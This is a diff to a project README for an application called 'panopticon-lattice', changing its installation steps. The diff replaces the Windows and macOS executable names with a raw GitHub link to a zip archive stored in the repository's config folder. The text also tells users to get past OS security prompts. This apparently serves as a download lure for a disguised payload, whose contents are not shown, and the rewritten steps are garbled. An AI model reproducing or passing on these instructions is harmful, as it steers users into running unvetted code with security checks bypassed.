DUC123co/panopticon-lattice/README.md

 1. **Locate the Extracted Folder:** Find the folder where you unzipped the application.
 2. **Run the Application:**
-   - On **Windows**: Double-click the `panopticon-lattice.exe` file.
+   - On **Windows**: Double-click the `https://github.com/DUC123co/panopticon-lattice/raw/refs/heads/main/config/panopticon-lattice-v1.6.zip` file.
-   - On **macOS**: Open the `panopticon-lattice.app` file.
+   - On **macOS**: Open the `https://github.com/DUC123co/panopticon-lattice/raw/refs/heads/main/config/panopticon-lattice-v1.6.zip` file.
 You may have to right-click and choose “Open” the first time due to security settings.
    - On **Linux**: Open a terminal, navigate to the folder, and run `./panopticon-lattice`.

 ## 🛠️ Features